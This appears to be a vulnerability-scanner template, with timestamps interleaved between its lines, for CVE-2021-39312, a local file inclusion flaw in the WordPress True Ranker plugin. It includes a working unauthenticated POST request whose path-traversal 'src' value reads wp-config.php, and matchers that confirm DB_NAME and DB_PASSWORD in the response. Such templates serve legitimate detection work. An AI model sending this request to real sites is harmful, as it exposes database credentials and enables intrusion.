2022-05-01 10:38:22 +00:00
id : CVE-2021-39312
info :
2022-06-30 14:54:05 +00:00
name : WordPress True Ranker <2.2.4 - Local File Inclusion
2022-05-01 10:38:22 +00:00
author : DhiyaneshDK
severity : high
2022-06-30 14:54:05 +00:00
description : WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.
2022-05-01 10:38:22 +00:00
reference :
- https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
2022-05-17 09:18:12 +00:00
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312
- https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
2022-06-30 14:54:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-39312
2022-05-17 09:18:12 +00:00
remediation : Fixed in version 2.2.4
2022-05-02 19:44:49 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-05-17 09:18:12 +00:00
cvss-score : 7.5
2022-05-02 19:44:49 +00:00
cve-id : CVE-2021-39312
cwe-id : CWE-22,CWE-22
2022-07-02 11:45:05 +00:00
tags : cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr
2022-05-01 10:38:22 +00:00
requests :
- raw :
- |
POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
2022-05-02 19:35:45 +00:00
2022-05-01 10:38:22 +00:00
matchers-condition : and
matchers :
- type : word
2022-05-02 19:35:45 +00:00
part : body
2022-05-01 10:38:22 +00:00
words :
2022-05-02 19:35:45 +00:00
- "DB_NAME"
- "DB_PASSWORD"
condition : and
2022-05-01 10:38:22 +00:00
- type : status
status :
- 200
2022-06-30 14:54:05 +00:00
# Enhanced by mp on 2022/06/30